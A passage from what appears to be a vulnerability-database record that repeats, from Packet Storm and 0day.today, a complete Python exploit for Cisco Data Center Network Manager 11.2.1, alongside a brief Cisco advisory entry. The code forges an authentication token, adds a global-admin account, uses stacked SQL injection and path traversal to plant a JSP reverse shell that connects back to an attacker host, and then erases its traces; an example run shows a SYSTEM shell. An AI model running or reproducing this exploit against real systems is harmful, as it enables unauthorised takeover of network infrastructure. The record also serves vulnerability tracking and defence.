'\\t\\t\\t<roleName>global-admin</roleName>'\n soap_body += '\\t\\t\\t<enablePwdExpiration>false</enablePwdExpiration>'\n soap_body += '\\t\\t</ep:addUser>'\n soap_body += '\\t</soapenv:Body>'\n soap_body += '</soapenv:Envelope>'\n uri = \"https://%s/DbAdminWSService/DbAdminWS\" % target\n r = requests.post(uri, data=soap_body, verify=False)\n tree = ElementTree.fromstring(r.content)\n for elem in tree.iter():\n if elem.tag == \"resultMessage\":\n res = elem.text\n if res == \"Success\":\n return True\n elif res == \"User already exists.\":\n return True\n return False\n\ndef main():\n\n usr = \"hacker\"\n pwd = \"Hacked123\"\n\n if len(sys.argv) != 3:\n print \"(+) usage: %s <target> <connectback>\" % sys.argv[0]\n print \"(+) eg: %s 192.168.100.122 192.168.100.59:1337\" % sys.argv[0]\n sys.exit(1)\n\n t = sys.argv[1]\n c = sys.argv[2]\n\n cbh = c.split(\":\")[0]\n cbp = c.split(\":\")[1]\n sc = _get_jsp(cbh, cbp).encode(\"hex\")\n\n # stage 1 - add a user\n if we_can_add_user(t, usr, pwd):\n print \"(+) created the account %s:%s\" % (usr, pwd)\n\n # stage 2 - trigger folder creation and db entry\n if we_can_trigger_folder_path_creation(t):\n print \"(+) created the 1337/custom path!\"\n\n # stage 3 - leak the vfs path (not really required I suppose)\n if we_can_leak_vfs(t):\n print \"(+) leaked vfs! %s\" % vfs\n\n # stage 4 - trigger the sql injection to update our template entry\n sp = \"../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp\" % vfs\n sql = \"update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';\" % (sp, sc)\n if we_can_trigger_sql_injection(t, sql):\n print \"(+) SQL Injection working!\"\n\n # stage 5 - trigger the shell write\n if we_can_trigger_second_order_write(t, sp):\n print \"(+) wrote the si.jsp shell!\"\n\n # stage 6 - cleanup\n sql = \"delete from xmldocs where user_name='1337';\"\n if we_can_trigger_sql_injection(t, sql):\n print \"(+) cleaned up the database!\"\n\n # stage 7 - go get some rce\n exec_code(t, usr, pwd, cbp)\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-02-06T22:56:51", "description": "", "cvss3": {}, "published": "2020-02-06T00:00:00", "type": "packetstorm", "title": "Cisco Data Center Network Manager 11.2.1 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-15976", "CVE-2019-15984"], "modified": "2020-02-06T00:00:00", "id": "PACKETSTORM:156239", "href": "https://packetstormsecurity.com/files/156239/Cisco-Data-Center-Network-Manager-11.2.1-SQL-Injection.html", "sourceData": "`#!/usr/bin/python \n\"\"\" \nCisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability \n \nTested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit) \n- Release: 11.2(1) \n- Release Date: 18-Jun-2019 \n- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip \n- Size: 1619.36 MB (1698022100 bytes) \n- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5 \n \nBug 1: CVE-2019-15976 / ZDI-20-008 \nBug 2: CVE-2019-15984 / ZDI-20-060 \n \nExample: \n======== \n \nsaturn:~ mr_me$ ./poc.py \n(+) usage: ./poc.py <target> <connectback> \n(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337 \n \nsaturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337 \n(+) created the account hacker:Hacked123 \n(+) created the 1337/custom path! \n(+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c \n(+) SQL Injection working! \n(+) wrote the si.jsp shell! \n(+) cleaned up the database! \n(+) starting handler on port 1337 \n(+) connection from 192.168.100.122 \n(+) pop thy shell! \nMicrosoft Windows [Version 6.3.9600] \n(c) 2013 Microsoft Corporation. All rights reserved. \n \nC:\\Program Files\\Cisco Systems\\dcm\\wildfly-10.1.0.Final\\bin\\service>whoami \nwhoami \nnt authority\\system \n \nC:\\Program Files\\Cisco Systems\\dcm\\wildfly-10.1.0.Final\\bin\\service> \n \nClean Up: \n========= \n \n1. delete from xmlDocs where user_name = '1337'; \n2. delete si.jsp from the web root \n3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337 \n\"\"\" \n \nimport re \nimport md5 \nimport sys \nimport time \nimport socket \nimport base64 \nimport requests \nimport telnetlib \nfrom threading import Thread \nfrom xml.etree import ElementTree \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \n \ndef _get_jsp(cbh, cbp): \n\"\"\" get me some jsp for a connectback! \"\"\" \njsp = \"\"\" \n<%%@page import=\"java.lang.*\"%%> \n<%%@page import=\"java.util.*\"%%> \n<%%@page import=\"java.io.*\"%%> \n<%%@page import=\"java.net.*\"%%> \n \n<%% \n// clean up \nString[] files = { \n\"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml\", \n\"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/\", \n\"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/\", \n}; \nfor (String s:files){ File f = new File(s); f.delete(); } \nFile f = new File(application.getRealPath(\"/\" + this.getClass().getSimpleName().replaceFirst(\"_\",\".\"))); \nf.delete(); \nclass StreamConnector extends Thread \n{ \nInputStream we; \nOutputStream uo; \n \nStreamConnector( InputStream we, OutputStream uo ) \n{ \nthis.we = we; \nthis.uo = uo; \n} \n \npublic void run() \n{ \nBufferedReader dy = null; \nBufferedWriter zvi = null; \ntry \n{ \ndy = new BufferedReader( new InputStreamReader( this.we ) ); \nzvi = new BufferedWriter( new OutputStreamWriter( this.uo ) ); \nchar buffer[] = new char[8192]; \nint length; \nwhile( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 ) \n{ \nzvi.write( buffer, 0, length ); \nzvi.flush(); \n} \n} catch( Exception e ){} \ntry \n{ \nif( dy != null ) \ndy.close(); \nif( zvi != null ) \nzvi.close(); \n} catch( Exception e ){} \n} \n} \n \ntry \n{ \nString ShellPath; \nShellPath = new String(\"cmd.exe\"); \nSocket socket = new Socket( \"%s\", %s); \nProcess process = Runtime.getRuntime().exec( ShellPath ); \n( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); \n( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); \n} catch( Exception e ) {} \n%%> \n\"\"\" % (cbh, cbp) \nreturn jsp \n \ndef get_session(target, user, password): \n\"\"\" we have bypassed auth at this point and created an admin \"\"\" \nd = { \n\"j_username\" : user, \n\"j_password\" : password \n} \nuri = \"https://%s/j_spring_security_check\" % target \nr = requests.post(uri, data=d, verify=False, allow_redirects=False) \nif \"Set-Cookie\" in r.headers: \nmatch = re.search(r\"JSESSIONID=(.{56}).*resttoken=(\\d{1,4}:.{44});\", r.headers[\"Set-Cookie\"]) \nif match: \nsessionid = match.group(1) \nresttoken = match.group(2) \nreturn { \"JSESSIONID\" : sessionid, \"resttoken\": resttoken} \nreturn False \n \ndef craft_soap_header(): \nsoap_header = '\\t<SOAP-ENV:Header xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">' \nsoap_header += '<m:ssoToken xmlns:m=\"http://ep.jaxws.dcbu.cisco.com/\">%s</m:ssoToken>' % gen_ssotoken() \nsoap_header += '\\t</SOAP-ENV:Header>' \nreturn soap_header \n \ndef we_can_trigger_folder_path_creation(target): \n\"\"\" craft the path location and db entry for the traversal \"\"\" \nsoap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">' \nsoap_body += craft_soap_header() \nsoap_body += '\\t<soapenv:Body>' \nsoap_body += '\\t\\t<ep:saveReportTemplate>' \nsoap_body += '\\t\\t\\t<reportTemplateName>si</reportTemplateName>' \nsoap_body += '\\t\\t\\t<userName>1337</userName>' \nsoap_body += '\\t\\t\\t<updatedAttrs></updatedAttrs>' \nsoap_body += '\\t\\t\\t<pmInterval>1337</pmInterval>' \nsoap_body += '\\t\\t</ep:saveReportTemplate>' \nsoap_body += '\\t</soapenv:Body>' \nsoap_body += '</soapenv:Envelope>' \nuri = \"https://%s/ReportWSService/ReportWS\" % target \nr = requests.post(uri, data=soap_body, verify=False) \nif r.status_code == 200: \nreturn True \nreturn False \n \ndef we_can_trigger_second_order_write(target, shellpath): \n\"\"\" trigger the traversal \"\"\" \nsoap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">' \nsoap_body += craft_soap_header() \nsoap_body += '\\t<soapenv:Body>' \nsoap_body += '\\t\\t<ep:openReportTemplate>' \nsoap_body += '\\t\\t\\t<reportTemplateName>%s</reportTemplateName>' % shellpath \nsoap_body += '\\t\\t\\t<userName>1337</userName>' \nsoap_body += '\\t\\t</ep:openReportTemplate>' \nsoap_body += '\\t</soapenv:Body>' \nsoap_body += '</soapenv:Envelope>' \nuri = \"https://%s/ReportWSService/ReportWS\" % target \nr = requests.post(uri, data=soap_body, verify=False) \nif r.status_code == 200: \nreturn True \nreturn False \n \ndef gen_ssotoken(): \n\"\"\" auth bypass \"\"\" \ntimestamp = 9999999999999 # we live forever \nusername = \"hax\" # doesnt even need to exist! \nsessionid = 1337 # doesnt even need to exist! \nd = \"%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF\" % (username, sessionid, timestamp) \nreturn \"%d.%d.%s.%s\" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username) \n \ndef we_can_trigger_sql_injection(target, sql): \n\"\"\" stacked sqli primitive \"\"\" \nsqli = \";%s--\" % sql \nsoap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">' \nsoap_body += craft_soap_header() \nsoap_body += '\\t<soapenv:Body>' \nsoap_body += '\\t\\t<ep:getVmHostData>' \nsoap_body += '\\t\\t\\t<arg0>' \nsoap_body += '\\t\\t\\t\\t<sortField>vcluster</sortField>' \nsoap_body += '\\t\\t\\t\\t<sortType>%s</sortType>' % sqli \nsoap_body += '\\t\\t\\t</arg0>' \nsoap_body += '\\t\\t\\t<arg1></arg1>' \nsoap_body += '\\t\\t\\t<arg2></arg2>' \nsoap_body += '\\t\\t\\t<arg3>false</arg3>' \nsoap_body += '\\t\\t</ep:getVmHostData>' \nsoap_body += '\\t</soapenv:Body>' \nsoap_body += '</soapenv:Envelope>' \nuri = \"https://%s/DbInventoryWSService/DbInventoryWS\" % target \nr = requests.post(uri, data=soap_body, verify=False) \nif r.status_code == 200: \nreturn True \nreturn False \n \ndef we_can_leak_vfs(target): \n\"\"\" we use a information disclosure for the vfs path \"\"\" \nglobal vfs \nuri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target \nc = requests.auth.HTTPBasicAuth('admin', 'nbv_12345') \nr = requests.get(uri, verify=False, auth=c) \nmatch = re.search(r\"temp\\\\(.{21}content-.{15,16})\", r.text) \nif match: \nvfs = str(match.group(1).replace(\"\\\\\",\"/\")) \nreturn True \nreturn False \n \ndef handler(lp): \n\"\"\" this is the client handler, to catch the connectback \"\"\" \nprint \"(+) starting handler on port %d\" % lp \nt = telnetlib.Telnet() \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.bind((\"0.0.0.0\", lp)) \ns.listen(1) \nconn, addr = s.accept() \nprint \"(+) connection from %s\" % addr[0] \nt.sock = conn \nprint \"(+) pop thy shell!\" \nt.interact() \n \ndef exec_code(t, usr, pwd, cbp): \n\"\"\" this function threads the client handler and sends off the attacking payload \"\"\" \nhandlerthr = Thread(target=handler, args=(int(cbp),)) \nhandlerthr.start() \nr = requests.get(\"https://%s/si.jsp\" % t, cookies=get_session(t, usr, pwd), verify=False) \n \ndef we_can_add_user(target, usr, pwd): \n\"\"\" add a user so that we can reach our backdoor! \"\"\" \nsoap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">' \nsoap_body += craft_soap_header() \nsoap_body += '\\t<soapenv:Body>' \nsoap_body += '\\t\\t<ep:addUser>' \nsoap_body += '\\t\\t\\t<userName>%s</userName>' % usr \nsoap_body += '\\t\\t\\t<password>%s</password>' % pwd \nsoap_body += '\\t\\t\\t<roleName>global-admin</roleName>' \nsoap_body += '\\t\\t\\t<enablePwdExpiration>false</enablePwdExpiration>' \nsoap_body += '\\t\\t</ep:addUser>' \nsoap_body += '\\t</soapenv:Body>' \nsoap_body += '</soapenv:Envelope>' \nuri = \"https://%s/DbAdminWSService/DbAdminWS\" % target \nr = requests.post(uri, data=soap_body, verify=False) \ntree = ElementTree.fromstring(r.content) \nfor elem in tree.iter(): \nif elem.tag == \"resultMessage\": \nres = elem.text \nif res == \"Success\": \nreturn True \nelif res == \"User already exists.\": \nreturn True \nreturn False \n \ndef main(): \n \nusr = \"hacker\" \npwd = \"Hacked123\" \n \nif len(sys.argv) != 3: \nprint \"(+) usage: %s <target> <connectback>\" % sys.argv[0] \nprint \"(+) eg: %s 192.168.100.122 192.168.100.59:1337\" % sys.argv[0] \nsys.exit(1) \n \nt = sys.argv[1] \nc = sys.argv[2] \n \ncbh = c.split(\":\")[0] \ncbp = c.split(\":\")[1] \nsc = _get_jsp(cbh, cbp).encode(\"hex\") \n \n# stage 1 - add a user \nif we_can_add_user(t, usr, pwd): \nprint \"(+) created the account %s:%s\" % (usr, pwd) \n \n# stage 2 - trigger folder creation and db entry \nif we_can_trigger_folder_path_creation(t): \nprint \"(+) created the 1337/custom path!\" \n \n# stage 3 - leak the vfs path (not really required I suppose) \nif we_can_leak_vfs(t): \nprint \"(+) leaked vfs! %s\" % vfs \n \n# stage 4 - trigger the sql injection to update our template entry \nsp = \"../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp\" % vfs \nsql = \"update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';\" % (sp, sc) \nif we_can_trigger_sql_injection(t, sql): \nprint \"(+) SQL Injection working!\" \n \n# stage 5 - trigger the shell write \nif we_can_trigger_second_order_write(t, sp): \nprint \"(+) wrote the si.jsp shell!\" \n \n# stage 6 - cleanup \nsql = \"delete from xmldocs where user_name='1337';\" \nif we_can_trigger_sql_injection(t, sql): \nprint \"(+) cleaned up the database!\" \n \n# stage 7 - go get some rce \nexec_code(t, usr, pwd, cbp) \n \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156239/cdcnm1121-sql.txt"}], "cisco": [{"lastseen": "2023-03-02T20:27:07", "description": "Multiple vulnerabilities in the REST and SOAP API endpoints of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to execute arbitrary SQL commands on an affected device. To exploit these vulnerabilities, an attacker would need administrative privileges on the DCNM application.\n\nFor more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.\n\nNote: The severity of these vulnerabilities is aggravated by the vulnerabilities described in the Cisco Data Center Network Manager Authentication Bypass Vulnerabilities [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass\"] advisory, published simultaneously with this one.\n\nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject\"]", "cvss3": {}, "published": "2020-01-02T16:00:00", "type": "cisco", "title": "Cisco Data Center Network Manager SQL Injection Vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-15984", "CVE-2019-15985"], "modified": "2020-01-15T15:57:59", "id": "CISCO-SA-20200102-DCNM-SQL-INJECT", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject", "cvss": {"score": 7.2, "vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}}], "zdt": [{"lastseen": "2020-02-07T01:08:55", "description": "Exploit for java platform in category web applications", "cvss3": {}, "published": "2020-02-06T00:00:00", "type": "zdt", "title": "Cisco Data Center Network Manager 11.2.1 - (getVmHostData) SQL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-15976", "CVE-2019-15984"], "modified": "2020-02-06T00:00:00", "id": "1337DAY-ID-33920", "href": "https://0day.today/exploit/description/33920", "sourceData": "#!/usr/bin/python\r\n\"\"\"\r\nCisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability\r\n\r\nTested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)\r\n- Release: 11.2(1)\r\n- Release Date: 18-Jun-2019\r\n- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip\r\n- Size: 1619.36 MB (1698022100 bytes)\r\n- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5 \r\n\r\nBug 1: CVE-2019-15976 / ZDI-20-008\r\nBug 2: CVE-2019-15984 / ZDI-20-060\r\n\r\nExample:\r\n========\r\n\r\nsaturn:~ mr_me$ ./poc.py \r\n(+) usage: ./poc.py <target> <connectback>\r\n(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337\r\n\r\nsaturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337\r\n(+) created the account hacker:Hacked123\r\n(+) created the 1337/custom path!\r\n(+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c\r\n(+) SQL Injection working!\r\n(+) wrote the si.jsp shell!\r\n(+) cleaned up the database!\r\n(+) starting handler on port 1337\r\n(+) connection from 192.168.100.122\r\n(+) pop thy shell!\r\nMicrosoft Windows [Version 6.3.9600]\r\n(c) 2013 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files\\Cisco Systems\\dcm\\wildfly-10.1.0.Final\\bin\\service>whoami\r\nwhoami\r\nnt authority\\system\r\n\r\nC:\\Program Files\\Cisco Systems\\dcm\\wildfly-10.1.0.Final\\bin\\service>\r\n\r\nClean Up:\r\n=========\r\n\r\n1. delete from xmlDocs where user_name = '1337';\r\n2. delete si.jsp from the web root\r\n3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337\r\n\"\"\"\r\n\r\nimport re\r\nimport md5\r\nimport sys\r\nimport time\r\nimport socket\r\nimport base64\r\nimport requests\r\nimport telnetlib\r\nfrom threading import Thread\r\nfrom xml.etree import ElementTree\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\ndef _get_jsp(cbh, cbp):\r\n \"\"\" get me some jsp for a connectback! \"\"\"\r\n jsp = \"\"\"\r\n <%%@page import=\"java.lang.*\"%%>\r\n <%%@page import=\"java.util.*\"%%>\r\n <%%@page import=\"java.io.*\"%%>\r\n <%%@page import=\"java.net.*\"%%>\r\n\r\n <%%\r\n // clean up\r\n String[] files = {\r\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml\", \r\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/\",\r\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/\",\r\n };\r\n for (String s:files){ File f = new File(s); f.delete(); }\r\n File f = new File(application.getRealPath(\"/\" + this.getClass().getSimpleName().replaceFirst(\"_\",\".\")));\r\n f.delete();\r\n class StreamConnector extends Thread\r\n {\r\n InputStream we;\r\n OutputStream uo;\r\n\r\n StreamConnector( InputStream we, OutputStream uo )\r\n {\r\n this.we = we;\r\n this.uo = uo;\r\n }\r\n\r\n public void run()\r\n {\r\n BufferedReader dy = null;\r\n BufferedWriter zvi = null;\r\n try\r\n {\r\n dy = new BufferedReader( new InputStreamReader( this.we ) );\r\n zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) );\r\n char buffer[] = new char[8192];\r\n int length;\r\n while( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 )\r\n {\r\n zvi.write( buffer, 0, length );\r\n zvi.flush();\r\n }\r\n } catch( Exception e ){}\r\n try\r\n {\r\n if( dy != null )\r\n dy.close();\r\n if( zvi != null )\r\n zvi.close();\r\n } catch( Exception e ){}\r\n }\r\n }\r\n\r\n try\r\n {\r\n String ShellPath;\r\n ShellPath = new String(\"cmd.exe\");\r\n Socket socket = new Socket( \"%s\", %s);\r\n Process process = Runtime.getRuntime().exec( ShellPath );\r\n ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();\r\n ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();\r\n } catch( Exception e ) {}\r\n %%>\r\n \"\"\" % (cbh, cbp)\r\n return jsp\r\n\r\ndef get_session(target, user, password):\r\n \"\"\" we have bypassed auth at this point and created an admin \"\"\"\r\n d = {\r\n \"j_username\" : user,\r\n \"j_password\" : password\r\n }\r\n uri = \"https://%s/j_spring_security_check\" % target\r\n r = requests.post(uri, data=d, verify=False, allow_redirects=False)\r\n if \"Set-Cookie\" in r.headers:\r\n match = re.search(r\"JSESSIONID=(.{56}).*resttoken=(\\d{1,4}:.{44});\", r.headers[\"Set-Cookie\"])\r\n if match:\r\n sessionid = match.group(1)\r\n resttoken = match.group(2)\r\n return { \"JSESSIONID\" : sessionid, \"resttoken\": resttoken}\r\n return False\r\n\r\ndef craft_soap_header():\r\n soap_header = '\\t<SOAP-ENV:Header xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">'\r\n soap_header += '<m:ssoToken xmlns:m=\"http://ep.jaxws.dcbu.cisco.com/\">%s</m:ssoToken>' % gen_ssotoken()\r\n soap_header += '\\t</SOAP-ENV:Header>'\r\n return soap_header\r\n\r\ndef we_can_trigger_folder_path_creation(target):\r\n \"\"\" craft the path location and db entry for the traversal \"\"\"\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:saveReportTemplate>'\r\n soap_body += '\\t\\t\\t<reportTemplateName>si</reportTemplateName>'\r\n soap_body += '\\t\\t\\t<userName>1337</userName>'\r\n soap_body += '\\t\\t\\t<updatedAttrs></updatedAttrs>'\r\n soap_body += '\\t\\t\\t<pmInterval>1337</pmInterval>'\r\n soap_body += '\\t\\t</ep:saveReportTemplate>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/ReportWSService/ReportWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n if r.status_code == 200:\r\n return True\r\n return False\r\n\r\ndef we_can_trigger_second_order_write(target, shellpath):\r\n \"\"\" trigger the traversal \"\"\"\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:openReportTemplate>'\r\n soap_body += '\\t\\t\\t<reportTemplateName>%s</reportTemplateName>' % shellpath\r\n soap_body += '\\t\\t\\t<userName>1337</userName>'\r\n soap_body += '\\t\\t</ep:openReportTemplate>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/ReportWSService/ReportWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n if r.status_code == 200:\r\n return True\r\n return False\r\n\r\ndef gen_ssotoken():\r\n \"\"\" auth bypass \"\"\"\r\n timestamp = 9999999999999 # we live forever\r\n username = \"hax\" # doesnt even need to exist!\r\n sessionid = 1337 # doesnt even need to exist!\r\n d = \"%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF\" % (username, sessionid, timestamp)\r\n return \"%d.%d.%s.%s\" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username)\r\n\r\ndef we_can_trigger_sql_injection(target, sql):\r\n \"\"\" stacked sqli primitive \"\"\"\r\n sqli = \";%s--\" % sql\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:getVmHostData>'\r\n soap_body += '\\t\\t\\t<arg0>'\r\n soap_body += '\\t\\t\\t\\t<sortField>vcluster</sortField>'\r\n soap_body += '\\t\\t\\t\\t<sortType>%s</sortType>' % sqli\r\n soap_body += '\\t\\t\\t</arg0>'\r\n soap_body += '\\t\\t\\t<arg1></arg1>'\r\n soap_body += '\\t\\t\\t<arg2></arg2>'\r\n soap_body += '\\t\\t\\t<arg3>false</arg3>'\r\n soap_body += '\\t\\t</ep:getVmHostData>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/DbInventoryWSService/DbInventoryWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n if r.status_code == 200:\r\n return True\r\n return False\r\n\r\ndef we_can_leak_vfs(target):\r\n \"\"\" we use a information disclosure for the vfs path \"\"\"\r\n global vfs\r\n uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target\r\n c = requests.auth.HTTPBasicAuth('admin', 'nbv_12345')\r\n r = requests.get(uri, verify=False, auth=c)\r\n match = re.search(r\"temp\\\\(.{21}content-.{15,16})\", r.text)\r\n if match:\r\n vfs = str(match.group(1).replace(\"\\\\\",\"/\"))\r\n return True\r\n return False\r\n\r\ndef handler(lp):\r\n \"\"\" this is the client handler, to catch the connectback \"\"\"\r\n print \"(+) starting handler on port %d\" % lp\r\n t = telnetlib.Telnet()\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((\"0.0.0.0\", lp))\r\n s.listen(1)\r\n conn, addr = s.accept()\r\n print \"(+) connection from %s\" % addr[0]\r\n t.sock = conn\r\n print \"(+) pop thy shell!\"\r\n t.interact()\r\n\r\ndef exec_code(t, usr, pwd, cbp):\r\n \"\"\" this function threads the client handler and sends off the attacking payload \"\"\"\r\n handlerthr = Thread(target=handler, args=(int(cbp),))\r\n handlerthr.start()\r\n r = requests.get(\"https://%s/si.jsp\" % t, cookies=get_session(t, usr, pwd), verify=False)\r\n\r\ndef we_can_add_user(target, usr, pwd):\r\n \"\"\" add a user so that we can reach our backdoor! \"\"\"\r\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\r\n soap_body += craft_soap_header()\r\n soap_body += '\\t<soapenv:Body>'\r\n soap_body += '\\t\\t<ep:addUser>'\r\n soap_body += '\\t\\t\\t<userName>%s</userName>' % usr\r\n soap_body += '\\t\\t\\t<password>%s</password>' % pwd\r\n soap_body += '\\t\\t\\t<roleName>global-admin</roleName>'\r\n soap_body += '\\t\\t\\t<enablePwdExpiration>false</enablePwdExpiration>'\r\n soap_body += '\\t\\t</ep:addUser>'\r\n soap_body += '\\t</soapenv:Body>'\r\n soap_body += '</soapenv:Envelope>'\r\n uri = \"https://%s/DbAdminWSService/DbAdminWS\" % target\r\n r = requests.post(uri, data=soap_body, verify=False)\r\n tree = ElementTree.fromstring(r.content)\r\n for elem in tree.iter():\r\n if elem.tag == \"resultMessage\":\r\n res = elem.text\r\n if res == \"Success\":\r\n return True\r\n elif res == \"User already exists.\":\r\n return True\r\n return False\r\n\r\ndef main():\r\n\r\n usr = \"hacker\"\r\n pwd = \"Hacked123\"\r\n\r\n if len(sys.argv) != 3:\r\n print \"(+) usage: %s <target> <connectback>\" % sys.argv[0]\r\n print \"(+) eg: %s 192.168.100.122 192.168.100.59:1337\" % sys.argv[0]\r\n sys.exit(1)\r\n\r\n t = sys.argv[1]\r\n c = sys.argv[2]\r\n\r\n cbh = c.split(\":\")[0]\r\n cbp = c.split(\":\")[1]\r\n sc = _get_jsp(cbh, cbp).encode(\"hex\")\r\n\r\n # stage 1 - add a user\r\n if we_can_add_user(t, usr, pwd):\r\n print \"(+) created the account %s:%s\" % (usr, pwd)\r\n\r\n # stage 2 - trigger folder creation and db entry\r\n if we_can_trigger_folder_path_creation(t):\r\n print \"(+) created the 1337/custom path!\"\r\n\r\n # stage 3 - leak the vfs path (not really required I suppose)\r\n if we_can_leak_vfs(t):\r\n print \"(+) leaked vfs! %s\" % vfs\r\n\r\n # stage 4 - trigger the sql injection to update our template entry\r\n sp = 